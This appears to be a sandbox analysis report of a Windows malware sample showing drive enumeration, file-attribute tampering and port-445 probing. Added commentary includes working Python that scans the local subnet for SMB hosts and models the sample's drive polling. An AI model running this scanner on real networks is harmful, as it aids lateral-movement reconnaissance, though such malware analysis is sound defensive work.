      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$MovePointerWrite$BuffersCloseCreateFlushHandle
      • String ID:
      • API String ID: 4283038262-0
      • Opcode ID: 05060edde094ea8c003b2475d3a6b43569fc07d5aada999477204ed7781efdff
      • Instruction ID: b2dacbd60be9e8f6572a2a985bb18f3b89e59656fc83f027dad2a794456bf0d3
      • Opcode Fuzzy Hash: 05060edde094ea8c003b2475d3a6b43569fc07d5aada999477204ed7781efdff
      • Instruction Fuzzy Hash: 87718F71A10309AFDF119FA4DC49BDF7BB9BF08300F044429F945E6292EB75AA64CB51
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00208ED8
      • GetFileSizeEx.KERNEL32(00000000,?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00208EEE
      • CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00208EFD
      • GetFileAttributesW.KERNEL32(?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00208F1B
      • SetFileAttributesW.KERNEL32(?,00000000,?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00208F3C
        • Part of subcall function 00208782: GetFileAttributesW.KERNEL32(?), ref: 002087F3
        • Part of subcall function 00208782: GetFileAttributesW.KERNEL32(?), ref: 00208816
        • Part of subcall function 00208782: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00208835
        • Part of subcall function 00208782: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 0020885C
        • Part of subcall function 00208782: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 0020888C
      • SetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 00208F8F
      • SetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 00208F94
      • CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00208F9C
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$Attributes$CloseCreateHandlePointer$Size
      • String ID:
      • API String ID: 3440144462-0
      • Opcode ID: 5ff8304bc954ab7d808e6ceadfd98818de516e9eebf66f045622b9046fd686ab
      • Instruction ID: 31bfbd72dcf4e32c01171bf453753ba1ce6ef44a5c75fcaeee11a88f8f1fa306
      • Opcode Fuzzy Hash: 5ff8304bc954ab7d808e6ceadfd98818de516e9eebf66f045622b9046fd686ab
      • Instruction Fuzzy Hash: A7315E7091030AAFDF119FB4DC88AAF7BBAEF04320F544115F955A26E2CB348A649B61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00202C15), ref: 00202444
      • CreateThread.KERNEL32(00000000,00000000,0020454B,00000000,00000000,00000000), ref: 0020245A
        • Part of subcall function 00204F7A: ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,00202C6F,00000001), ref: 00204F95
        • Part of subcall function 00204F7A: CloseHandle.KERNEL32(?,?,00202C6F,00000001), ref: 00204F9E
      • Sleep.KERNEL32(00000064), ref: 00202472
      • SetEvent.KERNEL32(00000000), ref: 00202486
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00202495
      • GetExitCodeThread.KERNEL32(?,?), ref: 002024A4
      • CloseHandle.KERNEL32(00000000), ref: 002024B1
      • CloseHandle.KERNEL32(?), ref: 002024B8
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CreateEventThread$CodeExitMutexObjectReleaseSingleSleepWait
      • String ID:
      • API String ID: 2313513115-0
      • Opcode ID: 5785ad8bf401359327730d7ea58a9bdfda0ae37fac6642ae0312b04c67967bf8
      • Instruction ID: 72d513e3d2013b04a57a9b1dd355b3b264272947179890d73aad44580c642f1c
      • Opcode Fuzzy Hash: 5785ad8bf401359327730d7ea58a9bdfda0ae37fac6642ae0312b04c67967bf8
      • Instruction Fuzzy Hash: 2511E135A10319FBD721AFA6AC8CEAFBF7DEBC5B50F504116F501A2182D6744904CA62
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • LeaveCriticalSection.KERNEL32(00201FEB,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 00205387
      • WaitForSingleObject.KERNEL32(A0A815FF,000000FF,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 00205392
      • EnterCriticalSection.KERNEL32(00201FEB,00201FDB,00000000,00000000,002058E8,00000000,0000010C,00000000,00000000,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 0020539D
      • ResetEvent.KERNEL32(468B0020,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 002053B3
      • ResetEvent.KERNEL32(20A0A815,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 002053CA
      • LeaveCriticalSection.KERNEL32(00201FEB,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 002053D9
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$EventLeaveReset$EnterObjectSingleWait
      • String ID:
      • API String ID: 622437971-0
      • Opcode ID: 1dc4fc18febefd3d633556dd4f07628461a3743c30a31346bd67ef42214dd54d
      • Instruction ID: 7fe2e29b3828b2e47148386e636b8305875a7f2d9e791662dce4f7734a2f7c41
      • Opcode Fuzzy Hash: 1dc4fc18febefd3d633556dd4f07628461a3743c30a31346bd67ef42214dd54d
      • Instruction Fuzzy Hash: 9C017131211B26CBD7206F29EC44A17B7FEEF107E13214A69E596D35A2E3B0EC118F90
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • GetIpAddrTable.IPHLPAPI(00000000,?,00000000), ref: 0020525F
      • htonl.WS2_32(00000004), ref: 0020527C
      • htonl.WS2_32(00000004), ref: 00205287
      • htonl.WS2_32(?), ref: 0020528E
        • Part of subcall function 00205067: htons.WS2_32(000001BD), ref: 00205085
        • Part of subcall function 00205067: htonl.WS2_32(00000000), ref: 002050DB
        • Part of subcall function 00205067: socket.WS2_32(00000002,00000001,00000006), ref: 002050EC
        • Part of subcall function 00205067: ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00205102
        • Part of subcall function 00205067: connect.WS2_32(00000000,?,00000010), ref: 00205113
        • Part of subcall function 00205067: WSAGetLastError.WS2_32 ref: 0020511D
        • Part of subcall function 00205067: getsockopt.WS2_32(?,0000FFFF,00001007,?,?), ref: 0020517C
        • Part of subcall function 00205067: recv.WS2_32(?,?,00000001,00000002), ref: 00205195
        • Part of subcall function 00205067: WSAGetLastError.WS2_32 ref: 002051A2
        • Part of subcall function 00205067: getpeername.WS2_32(?,?,?), ref: 002051C9
        • Part of subcall function 00205067: closesocket.WS2_32(?), ref: 002051E3
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: htonl$ErrorHeapLast$AddrAllocProcessTableclosesocketconnectgetpeernamegetsockopthtonsioctlsocketrecvsocket
      • String ID: w"
      • API String ID: 1223028931-841204015
      • Opcode ID: 3059f49234ff31c5a88d6be2a541e78cf4ce96fc0d79fd39316a806ecb9b1513
      • Instruction ID: b1c192680b6ab5f4719a683cf0773fd7bc8fff404d4260d67e1d5293b52415c6
      • Opcode Fuzzy Hash: 3059f49234ff31c5a88d6be2a541e78cf4ce96fc0d79fd39316a806ecb9b1513
      • Instruction Fuzzy Hash: 8011D071614326AFCB10AF68CC8586BBBA9FF48355F10092AF889C2253D731D964CFE1
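      The constants in the function above and its subcall 00205067 decode as follows: socket(2,1,6) is AF_INET / SOCK_STREAM / IPPROTO_TCP; ioctlsocket(s, 8004667E) is FIONBIO, i.e. the socket is switched to non-blocking mode before connect; htons(000001BD) is port 445 (SMB); getsockopt(s, 0000FFFF, 00001007) is SOL_SOCKET / SO_ERROR, the standard way to learn whether a non-blocking connect succeeded; recv(s, buf, 1, 2) is a one-byte MSG_PEEK; getpeername confirms the connection. Read together with GetIpAddrTable and the htonl arithmetic, this is a TCP reachability probe on port 445 against addresses derived from the local interface table. The Python below is an added example, not code from the report or from the sample: it reconstructs that probe sequence so an analyst can see what each Win32 call is doing. Treating the GetIpAddrTable/htonl arithmetic as "every other host in the interface's subnet" is an assumption; the listing does not show how the sample derives its target list.

```python
"""Added example (not from the report or the sample): reconstruction of the
non-blocking TCP connect probe implied by the API sequence in function
00205067, with the Winsock constants decoded into their POSIX equivalents.
Target derivation from GetIpAddrTable is modelled as "every other address in
the interface's subnet"; that part is an assumption."""
import errno
import ipaddress
import os
import select
import socket

# htons(0x1BD): 0x1BD == 445, the SMB port.
SMB_PORT = 0x1BD


def hosts_in_subnet(local_addr, netmask):
    """Candidate peers for one interface entry: every host address in the
    subnet except the interface's own address."""
    net = ipaddress.IPv4Network(f"{local_addr}/{netmask}", strict=False)
    return [str(h) for h in net.hosts() if str(h) != local_addr]


def probe_tcp(host, port, timeout=0.5):
    """Non-blocking connect with a bounded wait; returns (reachable, detail).

    socket(2,1,6)                  -> AF_INET, SOCK_STREAM, IPPROTO_TCP
    ioctlsocket(s, 0x8004667E)     -> FIONBIO: non-blocking mode
    connect + WSAGetLastError      -> expect "would block / in progress"
    getsockopt(s, 0xFFFF, 0x1007)  -> SOL_SOCKET, SO_ERROR: did it succeed?
    recv(s, buf, 1, 2)             -> MSG_PEEK: is the peer still there?
    getpeername                    -> final confirmation
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    s.setblocking(False)
    try:
        err = s.connect_ex((host, port))
        if err not in (0, errno.EINPROGRESS, errno.EWOULDBLOCK, errno.EAGAIN):
            return False, f"connect failed immediately: {os.strerror(err)}"
        # Writable means the handshake finished, successfully or not.
        _, writable, _ = select.select([], [s], [], timeout)
        if not writable:
            return False, "timeout"
        so_error = s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
        if so_error:
            return False, f"SO_ERROR: {os.strerror(so_error)}"
        try:
            if s.recv(1, socket.MSG_PEEK) == b"":
                return False, "peer closed the connection"
        except BlockingIOError:
            pass  # connected, nothing queued yet: normal for a listening SMB server
        except OSError as exc:
            return False, f"recv: {exc.strerror}"
        peer = s.getpeername()
        return True, f"connected to {peer[0]}:{peer[1]}"
    finally:
        s.close()


def scan_for_smb(local_addr, netmask, timeout=0.2):
    """Return the subnet hosts that accept a TCP connection on 445."""
    return [h for h in hosts_in_subnet(local_addr, netmask)
            if probe_tcp(h, SMB_PORT, timeout)[0]]


def loopback_demo():
    """Offline check: a listener on 127.0.0.1 is reachable, and the same
    port is refused once the listener is closed."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    open_result = probe_tcp("127.0.0.1", port)
    listener.close()
    closed_result = probe_tcp("127.0.0.1", port)
    return open_result[0], closed_result[0]


if __name__ == "__main__":
    print(loopback_demo())
```

      scan_for_smb() is the only function that touches the network beyond loopback; loopback_demo() exercises the probe against a local listener so the sequence can be checked without a lab network. On a defended host, the observable of this behaviour is one short-lived TCP SYN to port 445 per address in the local subnet from a process that has no business speaking SMB.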
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • EnterCriticalSection.KERNEL32(0000000C,?,0020339F), ref: 002032AB
      • DeleteCriticalSection.KERNEL32(0000000C,?,0020339F), ref: 002032B2
      • CloseHandle.KERNEL32(00000000,?,0020339F), ref: 002032C5
      • CloseHandle.KERNEL32(?,?,0020339F), ref: 002032CF
      • CloseHandle.KERNEL32(?,?,0020339F), ref: 002032D9
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CriticalSection$DeleteEnter
      • String ID:
      • API String ID: 622934417-0
      • Opcode ID: bf596c8be8ff99fd4fb9114035ca0d1f1683545a13fe608180894cbca606a714
      • Instruction ID: 82f8b198f50b6fcb311408667baef5fb7a2ae01a35f6b93c0977f092f14b8481
      • Opcode Fuzzy Hash: bf596c8be8ff99fd4fb9114035ca0d1f1683545a13fe608180894cbca606a714
      • Instruction Fuzzy Hash: 73F03A322143025FD760AF69EC89A2BB3EEAE94B10355080DF846D3593DB25FD928A61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • EnterCriticalSection.KERNEL32(0000000C,?,00000000,002057AF), ref: 002033CB
      • SetEvent.KERNEL32(?), ref: 002033DE
      • SetEvent.KERNEL32(00000000), ref: 002033E2
      • SetEvent.KERNEL32(?), ref: 002033E7
      • LeaveCriticalSection.KERNEL32(0000000C), ref: 002033EA
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Event$CriticalSection$EnterLeave
      • String ID:
      • API String ID: 259983309-0
      • Opcode ID: fb91e2edd9ceecbb67fd543452836f2b491795f2b3ba0f4507efb2badd151427
      • Instruction ID: 89370b50137a2cee375c5e0ef3b29797486fc5a18bfaf592690b3a9c5ac08c16
      • Opcode Fuzzy Hash: fb91e2edd9ceecbb67fd543452836f2b491795f2b3ba0f4507efb2badd151427
      • Instruction Fuzzy Hash: C9D06776101748EFD6216B66FD8CD4B7BBAEFC83613518818E19741432D732A859DF22
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00203C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,002028D8,00000000,00000000), ref: 00203CA2
      • GetLogicalDrives.KERNEL32 ref: 00201015
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocDrivesInformationLogicalProcessVolume
      • String ID: X:\$i. $i.
      • API String ID: 2665412759-2231886564
      • Opcode ID: acf675405929594fa5c7fa65909655db0dcbfc84ea0dc71f14845891a2a3a726
      • Instruction ID: 20e2f5a608affe2dcd02e305d952c8e633da492de86da4e763de97a7c7f3bbd8
      • Opcode Fuzzy Hash: acf675405929594fa5c7fa65909655db0dcbfc84ea0dc71f14845891a2a3a726
      • Instruction Fuzzy Hash: 09613E71D2030AAADF15ABA4DD46BAEBBB9AF04710F140069F504B61D3DB719EB0DF50
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00204147
      • GetProcAddress.KERNEL32(00000000), ref: 0020414E
      • CoGetObject.OLE32(?,?,0020A1F0,?), ref: 002041A1
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleObjectProc
      • String ID: $
      • API String ID: 4150452153-3993045852
      • Opcode ID: ef9104891f8354c685059dab962fd27be27e6e68fe9475804ff3d46bfa12987b
      • Instruction ID: 3cc6da38cbe181c9c7d0204bfbfcf59a57aae11db3fe5b362be2d5ddb1a9ba84
      • Opcode Fuzzy Hash: ef9104891f8354c685059dab962fd27be27e6e68fe9475804ff3d46bfa12987b
      • Instruction Fuzzy Hash: 9F415DB1A10319AFDB10DFE0D889AAEBBB9EF44705F108059F905E7292D7319A55CB50
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetLogicalDrives.KERNEL32 ref: 00201A82
        • Part of subcall function 0020530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,?,?,00202195), ref: 00205327
        • Part of subcall function 0020530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,00202195), ref: 00205347
        • Part of subcall function 0020530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00202195), ref: 00205352
        • Part of subcall function 00203C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,002028D8,00000000,00000000), ref: 00203CA2
        • Part of subcall function 00205962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00202E54), ref: 0020596A
        • Part of subcall function 00205962: LeaveCriticalSection.KERNEL32(?), ref: 00205973
        • Part of subcall function 00201706: htonl.WS2_32(?), ref: 00201774
        • Part of subcall function 00205840: CreateThread.KERNEL32(00000000,00000000,002056B3,00000000,00000000,00000000), ref: 002058F2
      • CloseHandle.KERNEL32(00000000), ref: 00201B37
      • CloseHandle.KERNEL32(00000000), ref: 00201B6B
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateCriticalSection$CloseEventHandle$CountDrivesEnterInformationInitializeLeaveLogicalSpinThreadVolumehtonl
      • String ID: \\?\X:
      • API String ID: 1738266806-1324186152
      • Opcode ID: ceb8917136dfcabf52c42b694f2a0830f66740702a622410ad5f53a647461564
      • Instruction ID: ee0b3c11fd7a57a10ead0fdbcd97b007bd1af4ead48253efe540fd82853be618
      • Opcode Fuzzy Hash: ceb8917136dfcabf52c42b694f2a0830f66740702a622410ad5f53a647461564
      • Instruction Fuzzy Hash: 2531F072520706ABCB21BF709C46A2FB7A9BF44720F004529F858961D3EB31D970CFA2
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetLogicalDrives.KERNEL32 ref: 00201CD1
        • Part of subcall function 00203C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,002028D8,00000000,00000000), ref: 00203CA2
        • Part of subcall function 0020530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,?,?,00202195), ref: 00205327
        • Part of subcall function 0020530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,00202195), ref: 00205347
        • Part of subcall function 0020530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00202195), ref: 00205352
        • Part of subcall function 00205962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00202E54), ref: 0020596A
        • Part of subcall function 00205962: LeaveCriticalSection.KERNEL32(?), ref: 00205973
      • GetLogicalDrives.KERNEL32 ref: 00201D33
      • Sleep.KERNEL32(000003E8), ref: 00201DC3
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$CreateDrivesEventLogical$CountEnterInformationInitializeLeaveSleepSpinVolume
      • String ID: \\?\ :
      • API String ID: 2297414327-2836105686
      • Opcode ID: 2bad3ab60ce667e53c2802a90e77bf17f6790738f12f69e7cbbde910593ebe13
      • Instruction ID: bb0a1d756e00f9f685b85adb20f6c76caa1f279a1fd830bca5044d3d9afa5f98
      • Opcode Fuzzy Hash: 2bad3ab60ce667e53c2802a90e77bf17f6790738f12f69e7cbbde910593ebe13
      • Instruction Fuzzy Hash: A9317E76914706AFC701EF60D88592BBBA9FF84350F400929F854962E3EB71DD748F92
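      The three functions that call GetLogicalDrives (00201015, 00201A82 and 00201CD1 above) share one pattern: the DWORD bitmask returned by GetLogicalDrives is walked bit by bit, each set bit becomes a drive letter that is substituted into a template string ("X:\" for GetVolumeInformationW in 00201015, "\\?\X:" in 00201A82), and 00201CD1 calls GetLogicalDrives twice around a Sleep(000003E8), i.e. a 1000 ms poll, which is how a volume attached after the sample started still gets picked up. The Python below is an added example, not code from the report or the sample, showing that mask-to-letter mapping and the poll-and-diff loop on constructed mask values; the template strings are taken from the String IDs above, everything else is illustration.

```python
"""Added example (not from the report or the sample): decoding the
GetLogicalDrives bitmask and polling it for newly attached volumes, as the
API sequences in functions 00201015, 00201A82 and 00201CD1 imply."""
import string


def mask_from_letters(letters):
    """Build a constructed GetLogicalDrives-style mask: bit 0 is A:, bit 25 is Z:."""
    mask = 0
    for letter in letters.upper():
        mask |= 1 << (ord(letter) - ord("A"))
    return mask


def drives_from_mask(mask):
    """Drive letters whose bit is set, in A..Z order."""
    return [letter for i, letter in enumerate(string.ascii_uppercase)
            if mask & (1 << i)]


def root_path(letter):
    """The 'X:\\' form (String ID of function 00201015), as passed to
    GetVolumeInformationW."""
    return f"{letter}:\\"


def extended_path(letter):
    """The '\\\\?\\X:' form (String ID of function 00201A82): the extended-length
    prefix that bypasses MAX_PATH and Win32 path normalisation."""
    return f"\\\\?\\{letter}:"


def newly_attached(previous_mask, current_mask):
    """Letters present now that were not present at the previous poll."""
    return drives_from_mask(current_mask & ~previous_mask)


def watch(mask_samples):
    """Simulate the GetLogicalDrives / Sleep(1000) / GetLogicalDrives loop of
    function 00201CD1 over a list of constructed mask samples.  Returns the
    extended paths of every drive the first time it is seen."""
    seen = 0
    found = []
    for mask in mask_samples:
        for letter in newly_attached(seen, mask):
            found.append(extended_path(letter))
        seen |= mask
    return found


if __name__ == "__main__":
    # Constructed sequence: C: and D: present, then E: appears between polls.
    samples = [mask_from_letters("CD"), mask_from_letters("CD"), mask_from_letters("CDE")]
    print(watch(samples))
```

      For detection purposes the interesting half is the poll: a process that re-reads the drive table every second is behaving like a backup agent or ransomware, and for a freshly dropped binary in a startup folder the second reading is the likelier one.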
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
        • Part of subcall function 00203D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,002048E0,?), ref: 00203D8C
        • Part of subcall function 00203D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00203DA1
        • Part of subcall function 00205B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00205B3B,00000000,00000000,00000000,002037EB,00000000), ref: 00205B19
      • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000000), ref: 00204908
      • CloseHandle.KERNEL32(?), ref: 0020491E
      • CloseHandle.KERNEL32(?), ref: 00204923
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
